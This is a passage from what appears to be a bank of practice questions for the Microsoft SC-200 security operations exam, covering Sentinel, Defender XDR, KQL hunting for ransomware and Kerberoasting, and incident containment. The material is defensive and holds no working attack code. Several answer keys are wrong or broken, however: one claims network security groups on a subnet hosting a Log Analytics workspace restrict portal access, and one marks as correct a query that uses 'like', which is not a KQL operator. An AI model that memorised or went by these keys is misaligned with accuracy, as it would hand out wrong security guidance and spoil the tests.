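| where isnotempty(Source) and Source !in ("-", "127.0.0.1", "::1")
| summarize Hosts = dcount(Target),
            HostList = make_set(Target, 20),
            Sources = make_set(Source, 10),
            FirstSeen = min(Time), LastSeen = max(Time)
          by Account, bin(Time, window)
| where Hosts >= hostThreshold
| order by Hosts desc
```

Service and scanning accounts will dominate the first run of this query; exclude them by account name once reviewed rather than raising the threshold, which would also hide a real operator moving between a handful of servers.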

481
MCQeasy

A security analyst in Microsoft 365 Defender is investigating an incident that contains multiple alerts from different sources (e.g., Microsoft Defender for Endpoint, Microsoft 365 Defender for Office). The analyst wants to see a consolidated list of all alerts associated with the incident, including their severity, status, and detection source. Which tab within the incident details page should the analyst use?

A.Alerts tab
B.Devices tab
C.Users tab
D.Mailboxes tab
AnswerA

Correct. The Alerts tab shows all alerts grouped under the incident.

Why this answer

The Alerts tab on the incident details page in Microsoft 365 Defender provides a consolidated, filterable list of all alerts linked to the incident, regardless of their source (e.g., Microsoft Defender for Endpoint, Microsoft Defender for Office 365). This tab displays each alert's severity, status, and detection source, allowing the analyst to triage and correlate alerts from different workloads in a single view. The other tabs focus on specific entities (devices, users, mailboxes) rather than the unified alert list.

Exam trap

The trap here is that candidates may confuse the entity-specific tabs (Devices, Users, Mailboxes) with the alert-centric view, mistakenly thinking those tabs also show alert metadata, but they only show associated entities and their properties, not the consolidated alert list with severity and detection source.

How to eliminate wrong answers

Option B is wrong because the Devices tab shows only the devices involved in the incident, not a consolidated list of alerts with their severity, status, and detection source. Option C is wrong because the Users tab lists user accounts related to the incident, not the alerts themselves. Option D is wrong because the Mailboxes tab displays only mailboxes associated with the incident, not the cross-source alert summary.

482
MCQmedium

Your company uses Microsoft Sentinel as its SIEM. You are investigating an incident where a user reported receiving a phishing email that appeared to come from the CEO requesting a wire transfer. The user did not respond. However, the incident also contains alerts from Microsoft Defender for Office 365 indicating that other users clicked on a malicious link in a similar email. The email was sent to 100 users. The company has Microsoft Defender for Endpoint deployed on all devices. The incident requires immediate containment to prevent further compromise. What should you do first?

A.Run a threat hunting query to find all users who clicked the link.
B.Block the malicious URL using Microsoft Defender for Cloud Apps.
C.Isolate the device of the user who reported the email.
D.Delete the email from all users' mailboxes using Microsoft 365 Defender.
AnswerB

Stops access to the URL across all devices.

Why this answer

Blocking the malicious URL (in Defender for Cloud Apps, or as a custom URL indicator in Defender for Endpoint) stops every managed device from reaching it, which contains the 100-recipient campaign at once. Option D removes the email but does not help users who already clicked; Option A is an investigation step that follows containment; Option C isolates only the reporting user's device, and that user did not click.

483
Multi-Selectmedium

Which TWO of the following KQL operators are most useful when building hunting queries to detect anomalous activities over time?

Select 2 answers
A.where
B.summarize
C.project
D.make_list
E.extend
AnswersB, D

summarize with bin() groups data by time intervals, essential for temporal analysis.

Why this answer

Options B and D are correct. summarize with bin() is fundamental for time-series analysis: it buckets events into fixed intervals so counts can be compared across time. make_list() (and make_set()) is used with summarize to collect the events in each bucket for inspection. Option E is incorrect because extend creates new columns but does not aggregate over time. Option A is incorrect because where filters rows but does not detect anomalies over time.

Option C is incorrect because project only selects columns.

484
MCQmedium

You are threat hunting for signs of credential dumping using Mimikatz. In Microsoft Defender for Identity, which type of alert would you expect to see?

A.Pass-the-Hash attack
B.Reconnaissance using SMB
C.Suspicious service creation
D.Brute force attack
AnswerC

Mimikatz often creates a service to run; Defender for Identity alerts on such activity.

Why this answer

Option C is correct because 'Suspicious service creation' fires when a service is created remotely on a monitored domain controller, which is how Mimikatz-style tooling is commonly staged and run. Option D is wrong because a brute force alert covers password guessing, not credential dumping. Option A is wrong because Pass-the-Hash is a related but distinct technique that uses already-dumped credentials.

Option B is wrong because SMB reconnaissance is enumeration, not credential dumping.

485
MCQhard

Your organization uses Microsoft Defender XDR and you are configuring attack surface reduction (ASR) rules. You need to implement a rule that blocks executable files from running unless they meet a prevalence, age, or trusted list criterion. Which ASR rule should you enable?

A.Block untrusted and unsigned processes that run from USB
B.Block Office applications from creating executable content
C.Block credential stealing from the Windows local security authority subsystem (lsass.exe)
D.Block executable files from running unless they meet a prevalence, age, or trusted list criterion
AnswerD

This ASR rule matches the description.

Why this answer

Option D is correct because the ASR rule 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25) prevents executable files (.exe, .dll, .scr) from running unless they have been seen widely enough (prevalence), are old enough (age), or are on a trusted list. The rule depends on cloud-delivered protection, which must be enabled for it to evaluate files; it directly matches the requirement described in the question.

Exam trap

The trap here is that candidates often confuse this ASR rule with the 'Block untrusted and unsigned processes that run from USB' rule, mistakenly thinking that 'untrusted' means the same as 'not meeting prevalence/age/trusted list criteria,' but the USB rule only applies to removable drives, not all executable files from any location.

How to eliminate wrong answers

Option A is wrong because 'Block untrusted and unsigned processes that run from USB' only blocks processes launched from USB removable drives, not all executable files regardless of source. Option B is wrong because 'Block Office applications from creating executable content' (GUID: 3b576869-a4ec-4529-8536-b80a7769e899) specifically targets Office apps (Word, Excel, etc.) writing executable content, not all executable files from any source. Option C is wrong because 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)' (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) protects LSASS memory from credential dumping; it does not evaluate executable files based on prevalence, age, or trusted list criteria.

486
MCQeasy

Refer to the exhibit. You deploy this ARM template to deploy a saved search in a Microsoft Sentinel workspace. After deployment, the saved search does not appear in Sentinel. What is the most likely reason?

A.The query syntax is invalid.
B.The resource type is incorrect.
C.The name parameter is incorrectly formatted.
D.The apiVersion is outdated for saved searches in Sentinel.
AnswerD

Newer apiVersions are required for Sentinel saved searches.

Why this answer

The apiVersion specified in the ARM template is outdated for saved searches in Microsoft Sentinel. Saved searches require a specific apiVersion (e.g., '2021-04-01' or later) that supports the 'Microsoft.OperationalInsights/workspaces/savedSearches' resource type. An outdated apiVersion can cause the deployment to fail silently or not register the saved search in Sentinel, even if the template syntax is otherwise valid.

Exam trap

The trap here is that candidates assume the apiVersion is just a formality and focus on syntax or resource type errors, but Microsoft specifically tests that you know saved searches in Sentinel require a recent apiVersion (e.g., '2021-04-01' or later) to be properly registered.

How to eliminate wrong answers

Option A is wrong because the query syntax being invalid would typically cause a deployment error or a warning, not a silent failure where the saved search does not appear; the ARM template would still deploy but the search might not run correctly. Option B is wrong because the resource type 'Microsoft.OperationalInsights/workspaces/savedSearches' is correct for saved searches in Sentinel; an incorrect resource type would result in a deployment error. Option C is wrong because the name parameter being incorrectly formatted would cause a validation error during deployment, preventing the template from deploying at all, not a silent absence of the saved search.

487
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. During an incident, you need to automatically disable a compromised Azure VM from the network. Which playbook action should you use?

A.Apply an Azure Policy to deny network changes.
B.Create an Azure Firewall rule to block the VM's IP.
C.Add a rule to the VM's network security group to deny all traffic.
D.Remove the VM's role assignment from Azure RBAC.
AnswerC

NSG rules can isolate the VM from network traffic.

Why this answer

Option C is correct because a deny-all rule added to the VM's network security group, at a higher priority than any existing allow rules, cuts inbound and outbound traffic at the network layer while the VM keeps running for forensics, and the NSG change can be made from a Logic App action. Option D is wrong because Azure RBAC controls management-plane permissions and does not affect network access. Option A is wrong because Azure Policy is a governance control, not a runtime network control.

Option B is wrong because Azure Firewall rules apply to traffic routed through the firewall, not to a specific VM.

488
MCQhard

Your organization uses Microsoft Sentinel. You need to ensure that only specific IP addresses from your corporate network can access the Sentinel workspace via the Azure portal. What should you configure?

A.Configure network security groups (NSGs) on the subnet hosting the Log Analytics workspace.
B.Configure a conditional access policy in Microsoft Entra ID.
C.Use Azure Firewall to restrict outbound traffic from the workspace.
D.Enable Azure Private Link for the workspace.
AnswerA

NSGs can filter traffic by source IP address.

Why this answer

Option A is correct because network security groups filter traffic by source IP address, so an NSG rule set can allow only corporate address ranges. Option B is wrong because Conditional Access policies apply to user authentication, not network-level access. Option C is wrong because Azure Firewall restricts outbound traffic, not who can reach the workspace.

Option D is wrong because Private Link restricts access to a private network rather than to specific public IP addresses.

489
MCQmedium

During an incident response, a security analyst identifies that a user's account was used to access sensitive data from an anomalous location. The analyst needs to immediately prevent further access from that account while preserving forensic data. Which action should the analyst take?

A.Revoke the user's current sessions in Microsoft Entra ID.
B.Block the IP address of the anomalous location in the firewall.
C.Disable the user account in Microsoft Entra ID.
D.Enable multi-factor authentication (MFA) for the user.
AnswerC

Disabling the account prevents all access and preserves data.

Why this answer

Disabling the user account in Microsoft Entra ID stops all new authentication for that identity while leaving the mailbox, sign-in logs and audit records intact for forensics. Option A only revokes current sessions; with valid credentials the attacker can sign in again. Option B blocks one address, and the attacker can return from another. Option D is a preventive control that does not end access already in progress.

490
Drag & Dropmedium

Arrange the steps to configure an Azure Sentinel data connector for Windows Security Events via Azure Monitor Agent in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

The Azure Monitor Agent uses DCRs to define data sources; the agent must be installed, then a DCR is created with the security events source, associated with the workspace, and finally verified.

491
Multi-Selecteasy

A security analyst is using Microsoft Sentinel to hunt for signs of a brute-force attack against Azure AD. Which TWO data sources are most relevant for this hunt?

Select 2 answers
A.AzureActivity
B.SigninLogs
C.OfficeActivity
D.AuditLogs
E.AADNonInteractiveUserSignInLogs
AnswersB, E

Contains sign-in events including failures, which are key for brute-force detection.

Why this answer

Option B (SigninLogs) contains successful and failed interactive sign-in attempts, including the error code for each failure. Option E (AADNonInteractiveUserSignInLogs) covers non-interactive sign-ins, which password-guessing tools also drive. Option D (AuditLogs) logs administrative actions, not sign-ins.

Option A (AzureActivity) logs resource operations. Option C (OfficeActivity) logs SharePoint and Exchange activities.

492
Multi-Selecthard

Which THREE data sources can be used in Microsoft Sentinel for threat hunting to detect unusual authentication patterns? (Choose three.)

Select 3 answers
A.SecurityEvent (Windows Event Logs)
B.AADNonInteractiveUserSignInLogs
C.CommonSecurityLog
D.OfficeActivity (Office 365)
E.SigninLogs (Microsoft Entra ID)
AnswersA, B, E

Contains logon events (Event ID 4624, 4625).

Why this answer

Option E is correct because SigninLogs from Microsoft Entra ID contain authentication data. Option A is correct because SecurityEvent (Windows Event Log) contains logon events (Event ID 4624, 4625). Option B is correct because AADNonInteractiveUserSignInLogs contain non-interactive sign-ins.

Option D is wrong because OfficeActivity contains workload audit records, not authentication. Option C is wrong because CommonSecurityLog carries CEF events from network devices, not directory authentication.

493
MCQhard

You are hunting for signs of ransomware using Microsoft Defender XDR's advanced hunting. Which query pattern would best identify a process that encrypts many files in a short time?

A.DeviceFileEvents | summarize Duration = max(Timestamp)-min(Timestamp) by DeviceName, InitiatingProcessFileName | where Duration < 1h
B.DeviceFileEvents | where ActionType == 'FileModified' | summarize Count = count() by DeviceName, InitiatingProcessFileName, bin(Timestamp, 5m) | where Count > 100
C.DeviceProcessEvents | where FileName in ('powershell.exe', 'wscript.exe') | summarize by DeviceName
D.DeviceFileEvents | summarize Count = count() by DeviceName | where Count > 1000
AnswerB

High file modification count per process in a short window is indicative of ransomware.

Why this answer

Option B is correct because it counts file modifications per device and initiating process in five-minute buckets, then filters for high counts; many files touched by one process in a short window is the ransomware signature. Option C is wrong because it looks at process creations, not file modifications. Option A is wrong because it measures how long a process was active, not how many files it changed.

Option D is wrong because it groups only by device, losing the process responsible.
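As an added example (not from the original page), the following KQL extends option B's pattern with two signals that cut false positives from backup agents and indexers: renames that change the file extension, and spread across many folders. The thresholds and the Windows-directory exclusions are assumptions to tune.

```kql
// Added example: option B's count-per-process pattern plus extension-changing renames
// and folder spread. Thresholds (100 events, 20 folders or 50 renames per 5 minutes)
// are assumptions.
DeviceFileEvents
| where Timestamp > ago(1d)
| where ActionType in ("FileModified", "FileRenamed", "FileCreated")
// Skip OS servicing noise; revisit these exclusions if the actor runs from System32.
| where not(FolderPath startswith @"C:\Windows\")
| where not(InitiatingProcessFolderPath startswith @"C:\Windows\")
| extend NewExt = tolower(extract(@"\.([A-Za-z0-9]+)$", 1, FileName)),
         OldExt = tolower(extract(@"\.([A-Za-z0-9]+)$", 1, PreviousFileName)),
         Dir = tostring(parse_path(FolderPath).DirectoryPath)
| extend ExtChanged = ActionType == "FileRenamed" and isnotempty(OldExt) and OldExt != NewExt
| summarize Events = count(),
            Renamed = countif(ExtChanged),
            Folders = dcount(Dir),
            NewExtensions = make_set_if(NewExt, ExtChanged, 5),
            SampleFiles = make_set(FileName, 5)
          by DeviceName, InitiatingProcessFileName, InitiatingProcessId,
             InitiatingProcessSHA256, bin(Timestamp, 5m)
| where Events > 100 and (Folders > 20 or Renamed > 50)
| order by Events desc
```

NewExtensions is the column to read first: a single new extension across hundreds of renames is the encryptor's suffix, and InitiatingProcessSHA256 gives you the hash to pivot on across the fleet.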

494
Multi-Selecteasy

Your SOC team needs to ensure that all incidents in Microsoft Sentinel are assigned to an analyst within 30 minutes of creation. Which TWO configurations should you implement?

Select 2 answers
A.Create a playbook that uses the Update Incident action to set the owner field.
B.Set up a playbook that sends an email to the SOC manager when an incident is created.
C.Create an automation rule that triggers when an incident is created and sets the owner.
D.Configure a Microsoft Teams connector to post incidents to a channel.
E.Modify the analytics rule to include a custom details field for analyst name.
AnswersA, C

Playbooks can update incident properties including owner.

Why this answer

Option C (an automation rule that triggers on incident creation and sets the owner) assigns incidents without any playbook. Option A (a playbook using the Update Incident action) can also set the owner, for example to route by severity or on-call schedule. Option B is email notification, not assignment.

Option D is for collaboration, not assignment. Option E only adds a field to the alert; it does not assign anyone.

495
MCQmedium

Your organization uses Microsoft Defender for Endpoint. A user reports that their device is running slowly and exhibiting unusual network activity. You run a live response session and find a suspicious process running. Which action should you take first to contain the threat?

A.Collect a full memory dump for analysis.
B.Terminate the suspicious process.
C.Isolate the device from the network.
D.Add a firewall rule to block outbound traffic from the device.
AnswerC

Isolating the device prevents lateral movement and further damage.

Why this answer

Option C is correct because isolating the device immediately cuts its network access (except to the Defender for Endpoint service) and stops lateral movement while you keep investigating through live response. Option B is wrong because terminating the process alone does not prevent re-execution. Option A is wrong because collecting a memory dump does not contain the threat.

Option D is wrong because a host firewall rule is slower to apply and may not block all lateral movement.

496
MCQhard

Refer to the exhibit. You are hunting for PowerShell used to launch cmd.exe. The query is intended to find cmd.exe processes that occurred after the first PowerShell execution on the same device. However, it returns no results. What is the most likely issue?

A.The query should filter on a specific time range instead of using FirstSeen.
B.The join key should be DeviceName instead of DeviceId.
C.The FirstSeen variable is a table, not a scalar value; 'between' cannot be used with a table.
D.The join type should be innerunique, not leftsemi.
AnswerC

The summarize min(Timestamp) returns a table with a column, not a scalar; 'between' requires a scalar.

Why this answer

Option C is correct because `summarize min(Timestamp)` returns a one-row table, not a scalar, while the `between` operator expects two datetime values; wrapping the subquery in toscalar(), or joining the per-device minimum back onto the events, fixes it. Option D is wrong because a leftsemi join is a valid way to keep only devices that saw PowerShell, even though it brings no columns from the right side. Option A is wrong because the query is meant to use the first-seen time, not a fixed time range.

Option B is wrong because DeviceId is the correct join key; it stays stable across device renames.
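The exhibit is not reproduced above. The following is an added KQL example (not the original exhibit) of the corrected query: the first PowerShell time is computed per device and joined back, so the comparison is against a datetime column rather than a table. The lookback is an assumption; a comment shows the single-device toscalar() form.

```kql
// Added example: cmd.exe launched after the first PowerShell execution on the same device.
// summarize returns a table, so FirstSeen is joined per DeviceId rather than used directly.
// Lookback (1d) is an assumption.
let lookback = 1d;
let FirstPowerShell = DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
    | summarize FirstSeen = min(Timestamp) by DeviceId;
// Single-device alternative:
//   let FirstSeen = toscalar(DeviceProcessEvents | where DeviceId == "<id>" ... | summarize min(Timestamp));
DeviceProcessEvents
| where Timestamp > ago(lookback)
| where FileName =~ "cmd.exe"
| join kind=inner (FirstPowerShell) on DeviceId
| where Timestamp between (FirstSeen .. now())
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine, FirstSeen
| order by Timestamp asc
```

The join form is also what you want for hunting across a fleet: the toscalar() version collapses every device's first PowerShell run into one timestamp, which is only meaningful when the query is already scoped to a single DeviceId.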

497
MCQeasy

A company uses Microsoft Defender for Cloud. They need to continuously assess the compliance of their Azure resources against the CIS benchmark. Which feature should they enable?

A.Regulatory compliance dashboard
B.Secure Score
C.Azure Policy
D.Just-In-Time VM access
AnswerA

Correct. The Regulatory compliance dashboard includes built-in initiatives for standards like CIS, allowing continuous compliance monitoring.

Why this answer

The Regulatory Compliance dashboard in Defender for Cloud provides built-in compliance standards such as the CIS Microsoft Azure Foundations Benchmark, SOC 2, and PCI DSS. By assigning the appropriate initiative, the dashboard continuously assesses resources and reports compliance status per control. Secure Score is an aggregated risk score, not a compliance standard.

Azure Policy is the underlying service used to enforce policies, but the feature that presents compliance is the dashboard. Just-in-Time VM access is a security control, not a compliance assessment tool.

498
MCQhard

During a ransomware investigation, a security analyst finds that multiple files on a file server have been encrypted. The server runs Microsoft Defender for Cloud and has been onboarded to Microsoft Sentinel. Which data source in Sentinel would provide the most granular information about the file encryption events?

A.Microsoft Defender for Cloud (Azure Defender) alerts
B.Azure Activity Log
C.Windows Security Events via MMA
D.Sysmon events via Azure Monitor Agent
AnswerA

Defender for Cloud can detect file encryption patterns and provide alerts with detailed process and file information.

Why this answer

Microsoft Defender for Cloud (formerly Azure Defender) provides file integrity monitoring and security events at the OS level. Sysmon via AMA would need specific configuration; Windows Security Events may not capture encryption; Azure Activity Log is for control plane events.

499
MCQeasy

Your organization uses Microsoft Sentinel. The SOC manager wants to track the average time to triage incidents. You need to create a report that shows this metric. What should you use?

A.Create a workbook that uses KQL to query incident data and display the average time.
B.Create a playbook that sends a report via email.
C.Create an automation rule that logs the triage time to a custom table.
D.Create an analytics rule that calculates the time to triage.
AnswerA

Correct: Workbooks can visualize data from tables.

Why this answer

Option A is correct because a workbook can query the SecurityIncident table, compute the time between CreatedTime and the first modification, and chart the average. Option D is wrong because analytics rules generate alerts, not reports. Option C is wrong because automation rules act on incidents and do not write custom tables.

Option B is wrong because playbooks are for automated response, not reporting.

500
MCQmedium

You are responding to a data exfiltration incident involving a user who copied sensitive files to a personal cloud storage service. The files were accessed from the user's managed device. Which Microsoft Defender for Cloud Apps activity policy should you create to detect similar future incidents?

A.An anomaly detection policy that flags impossible travel.
B.An activity policy that detects uploads to personal cloud storage services.
C.A file policy that detects files shared with external users.
D.An app discovery policy that identifies new cloud apps used in the organization.
AnswerB

Activity policies monitor specific activities like file uploads to non-corporate apps.

Why this answer

Option B is correct because an activity policy can match file uploads to non-corporate cloud storage apps and alert on or act on them. Option C is wrong because a file policy applies to files already stored in sanctioned cloud apps. Option A is wrong because an anomaly detection policy looks for unusual behavior such as impossible travel, not a specific upload activity.

Option D is wrong because an app discovery policy identifies shadow IT apps, not specific activities.

501
MCQeasy

You are investigating a ransomware incident in Microsoft Sentinel. The incident contains multiple alerts. You need to group related alerts under the same incident to reduce alert fatigue. What should you do?

A.Enable User and Entity Behavior Analytics (UEBA).
B.Create a new analytics rule to combine alerts.
C.Use an automation rule to merge incidents.
D.Configure incident creation rules in the analytics rule.
AnswerD

Incident creation rules allow grouping alerts into incidents based on entities.

Why this answer

Option D is correct because the incident settings (alert grouping) of an analytics rule group alerts into one incident by matching entities within a time window. Option B is wrong because analytics rules generate alerts; a new rule adds more alerts rather than grouping existing ones. Option C is wrong because automation rules change incident properties and run playbooks; they do not merge incidents.

Option A is wrong because UEBA is a separate anomaly-scoring feature.

502
MCQmedium

Your organization has Microsoft Sentinel deployed in a single workspace. You need to implement role-based access control (RBAC) so that only senior analysts can modify analytics rules, while junior analysts can only view incidents. You have created custom roles in Azure. You assign the junior analysts the 'Microsoft Sentinel Reader' role. However, you find that junior analysts can still create and modify analytics rules. What is the most likely reason?

A.The 'Microsoft Sentinel Reader' role does not exist; you used the wrong role.
B.The junior analysts are members of a group that has a role assignment on the workspace.
C.The junior analysts have been assigned the 'Contributor' role on the resource group containing the workspace.
D.You need to create a custom role instead of using built-in roles.
AnswerC

Contributor role at a higher scope overrides the Reader role on the workspace.

Why this answer

Option C is correct because Azure RBAC is additive and inherited: a Contributor assignment on the resource group flows down to the workspace, and the union of a user's assignments applies, so Reader on the workspace takes nothing away. Option A is wrong because 'Microsoft Sentinel Reader' is a real built-in role. Option B names a possibility rather than the cause; a group membership only matters if the group holds a write-capable role at some scope, which is the Contributor case in option C.

Option D is wrong because the built-in Sentinel roles already separate read from write.

503
Multi-Selectmedium

Which TWO of the following are valid response actions that can be taken on a device from Microsoft Defender for Endpoint? (Choose two.)

Select 2 answers
A.Quarantine email
B.Disable user account
C.Run antivirus scan
D.Reset user password
E.Isolate device from network
AnswersC, E

Running antivirus scan is a standard response action.

Why this answer

The correct answers are C and E. Isolate device and Run antivirus scan are device response actions on the Defender for Endpoint device page. Option D is wrong because a password reset is an identity action.

Option B is wrong because disabling the user is an identity action. Option A is wrong because quarantining an email is a Defender for Office 365 action.

504
MCQhard

Your organization has Microsoft Sentinel with UEBA enabled. An incident is generated for a user with high risk score. You need to identify if the user's recent behavior deviates from their baseline. Which Sentinel feature should you use?

A.A custom hunting query using the BehaviorAnalytics table.
B.The user's Azure AD sign-in logs.
C.The UEBA timeline in the entity page.
D.The incident investigation graph.
AnswerC

UEBA timeline shows baseline deviations.

Why this answer

The UEBA timeline in the entity page is the correct feature because it provides a chronological view of a user's activities, including deviations from their established behavioral baseline. When UEBA is enabled, Sentinel profiles normal behavior for each user and flags anomalies; the timeline directly visualizes these deviations, such as unusual login times, locations, or resource access, which aligns with the need to identify if recent behavior deviates from the baseline.

Exam trap

The trap here is that candidates often confuse the BehaviorAnalytics table (option A) as the primary tool for deviation analysis, overlooking that the UEBA timeline is the purpose-built, no-code interface for visualizing baseline deviations directly on the entity page.

How to eliminate wrong answers

Option A is wrong because a custom hunting query using the BehaviorAnalytics table, while capable of surfacing UEBA data, is not the dedicated feature for quickly viewing a user's behavioral timeline and deviations; it requires writing and executing a KQL query, which is less efficient than the built-in timeline. Option B is wrong because Azure AD sign-in logs only show authentication events and do not incorporate UEBA's behavioral baseline analysis or deviations; they lack the contextual anomaly scoring and timeline of behavioral changes. Option D is wrong because the incident investigation graph focuses on mapping relationships between entities and alerts within an incident, not on displaying a user's behavioral timeline or baseline deviations.

505
MCQmedium

You are threat hunting in Microsoft Defender XDR for signs of Kerberoasting. Which hunting query would be most effective in identifying Kerberoasting activity?

A.IdentityDirectoryEvents | where AccountDomain == 'Service Accounts'
B.IdentityQueryEvents | where QueryTarget like 'TGS' | summarize count() by InitiatingAccount, IPAddress | where count_ > 10
C.IdentityLogonEvents | where Application == 'Kerberos' and Result == 'Failed'
D.IdentityLogonEvents | where LogonType == 'Failed'
AnswerB

Anomalous TGS queries are a key indicator of Kerberoasting.

Why this answer

Option B is correct because Kerberoasting shows up as one account requesting service tickets (TGS) for many service principal names in a short period, so counting TGS requests per initiating account and source IP and alerting above a threshold surfaces the behaviour. Option A is incorrect because filtering IdentityDirectoryEvents to a 'Service Accounts' domain looks at the targets, not at the requester's activity. Option C is incorrect because failed Kerberos logons are not specific to Kerberoasting; the attacker uses a valid credential and the ticket requests succeed.

Option D is incorrect for the same reason: logon failures are not the indicator, the volume of successful service-ticket requests is. In a real hunt you also key on the ticket encryption type, because the tooling requests RC4 tickets (type 0x17) since those crack fastest, and you count distinct SPNs rather than raw requests so a busy but legitimate user does not trip the rule.

506
MCQmedium

During an incident response, you identify that a user's account was used to sign in from an unusual location. You need to contain the incident immediately. What should you do first?

A.Reset the user's password.
B.Disable the user account in Microsoft Entra ID.
C.Revoke the user's refresh tokens.
D.Create a Conditional Access policy to block the user.
AnswerB

Disabling the account immediately stops all sign-ins, containing the incident.

Why this answer

Option B is correct because disabling the account in Microsoft Entra ID is the fastest single action that stops all new sign-ins. Option A is wrong because a password reset alone leaves the tokens and sessions the attacker already holds usable. Option C is wrong because revoking refresh tokens forces re-authentication but does not stop the attacker signing in again with the stolen credential.

Option D is wrong because a Conditional Access policy is only evaluated at the next authentication and can take time to take effect, so it is not an immediate containment step. In practice the containment runbook does both B and C: disabling the account blocks new token issuance, but access tokens already issued stay valid until they expire (about an hour) unless the application supports Continuous Access Evaluation, so revoking sign-in sessions is also needed to cut off the attacker's existing sessions.
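The two-step containment described above, as an added example that is not part of the question bank. It uses two Microsoft Graph v1.0 operations that exist today (PATCH /users/{id} with accountEnabled false, and POST /users/{id}/revokeSignInSessions); the user principal name, token and required permissions named in the comments are assumptions about your tenant, and the transport is injectable so the logic can be exercised without network access.

```python
"""Contain a compromised Microsoft Entra ID user: disable the account, then revoke sessions.

Added example; not code from the question bank. The Graph calls are real v1.0
endpoints; the token is assumed to carry User.EnableDisableAccount.All (or
User.ReadWrite.All) and User.RevokeSessions.All. The UPN below is a placeholder.
"""
import json
import urllib.error
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"


def containment_requests(user_id):
    """Ordered Graph calls. Disable first so no new tokens are issued, then revoke:
    revokeSignInSessions invalidates refresh tokens, so cached sessions must
    re-authenticate and fail against the disabled account. Access tokens already
    issued stay valid until expiry unless the app uses Continuous Access
    Evaluation, which is why a password reset alone is not containment."""
    return [
        ("PATCH", f"{GRAPH}/users/{user_id}", {"accountEnabled": False}),
        ("POST", f"{GRAPH}/users/{user_id}/revokeSignInSessions", None),
    ]


def http_send(method, url, body, token):
    """Default transport: one Graph request; returns the HTTP status code."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method, headers={
        "Authorization": f"Bearer {token}", "Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:   # urllib raises on 4xx/5xx; surface the code instead
        return err.code


def contain_user(user_id, token, send=http_send):
    """Run both steps in order. A failed disable aborts before the revoke so the
    caller sees incomplete containment instead of a misleading partial success."""
    results = []
    for method, url, body in containment_requests(user_id):
        status = send(method, url, body, token)   # PATCH returns 204, the revoke action 200
        results.append((method, url, status))
        if status not in (200, 204):
            raise RuntimeError(f"containment incomplete: {method} {url} returned {status}")
    return results


if __name__ == "__main__":
    # dry run: print the calls instead of sending them
    for method, url, body in containment_requests("jdoe@contoso.com"):
        print(method, url, body)
```

A Sentinel playbook does the same two operations through the Entra ID connector; keeping the order (disable, then revoke) matters, because revoking first only forces the attacker to re-authenticate with the credential they still hold.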

507
MCQmedium

Your organization has a Microsoft Sentinel workspace that ingests logs from multiple sources. You need to implement a process to review and approve changes to analytics rules before they are deployed to production. What should you use?

A.Create a playbook that emails the SOC manager when an analytics rule is modified.
B.Use a workbook to track changes to analytics rules.
C.Configure Microsoft Sentinel repository integration with Azure DevOps and use branch policies for approval.
D.Export analytics rules to a notebook for manual review.
AnswerC

CI/CD with approval workflows.

Why this answer

Option C is correct because Microsoft Sentinel's repository integration with Azure DevOps or GitHub deploys analytics rules from source control, so branch policies and pull requests give you a review and approval gate before a change reaches the workspace. Option A is wrong because a playbook can only notify the SOC manager after a rule has already changed; it does not gate the change. Option B is wrong because workbooks are for visualisation.

Option D is wrong because notebooks are for investigation and advanced analytics, not change control.

508
Multi-Selecteasy

Which TWO are immediate containment actions in Microsoft Sentinel for a compromised Azure VM? (Choose two.)

Select 2 answers
A.Install anti-malware extension
B.Apply an NSG to block all inbound and outbound traffic
C.Reset the VM administrator password
D.Initiate a VM backup
E.Stop the VM using an automation rule
AnswersB, E

NSG blocks network communication immediately.

Why this answer

Options B and E are correct. Applying a network security group (NSG) that denies all inbound and outbound traffic cuts the VM off from the attacker and from any command-and-control channel, and a playbook run by an automation rule can do it the moment the incident is created. Stopping the VM, likewise through a playbook, halts whatever is running on it. Option A is wrong because installing an anti-malware extension takes time and may not stop the running attack. Option C is wrong because resetting the administrator password does not stop processes that are already running.

Option D is wrong because a backup preserves data but does not contain anything. One caveat before choosing E over B: stopping the VM destroys volatile evidence (memory, running processes, network connections), so if forensics matter, capture a disk snapshot or memory first, or prefer the NSG isolation and leave the VM running.

509
MCQhard

You are responding to a data exfiltration incident in Microsoft Sentinel. The attacker used a PowerShell script to upload data to an external storage account. You need to identify the specific storage account used. Which KQL query should you use in the AzureActivity table?

A.OperationName == 'Get Storage Account Properties'
B.OperationName == 'Storage Blob Upload'
C.OperationName == 'Create or Update Storage Account'
D.OperationName == 'List Storage Account Keys'
AnswerB

Storage Blob Upload is the operation that corresponds to uploading data to a blob.

Why this answer

Option B is correct because, of the listed operations, Storage Blob Upload is the one that describes data being written to a blob; the other three are management operations on the storage account itself. Option A is wrong because Get Storage Account Properties is read-only. Option C is wrong because Create or Update Storage Account is provisioning.

Option D is wrong because List Storage Account Keys retrieves keys; it does not move data. A caveat for real investigations: AzureActivity records only Azure Resource Manager control-plane operations in your own subscriptions. Blob uploads are data-plane operations; for a storage account you own they appear in the StorageBlobLogs table (and only if diagnostic settings send them to the workspace), and for an account the attacker controls they never appear in your Azure logs at all. In that case the account name has to be recovered from endpoint telemetry: the PowerShell command line and the process's outbound connections to *.blob.core.windows.net. A List Storage Account Keys event in AzureActivity is still worth pulling, because an attacker who stages data through one of your own accounts needs a key or SAS token, and listing keys is recorded there.
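Recovering the destination storage account from endpoint telemetry, as an added example that is not part of the question bank. Column names follow the Defender XDR DeviceProcessEvents and DeviceNetworkEvents tables (ProcessCommandLine, RemoteUrl, InitiatingProcessFileName); the rows, device names and storage account names are constructed, and the regular expressions for Az.Storage parameters and blob endpoints are assumptions about what the script looked like.

```python
"""Recover the destination storage account of a PowerShell exfiltration from endpoint telemetry.

Added example; not code from the question bank. Blob uploads are data-plane
operations: AzureActivity never shows them, and when the attacker owns the
storage account your tenant's StorageBlobLogs do not either. What you do have
is the script's command line and the outbound connections it made. Rows below
are constructed; column names follow the real Defender XDR tables.
"""
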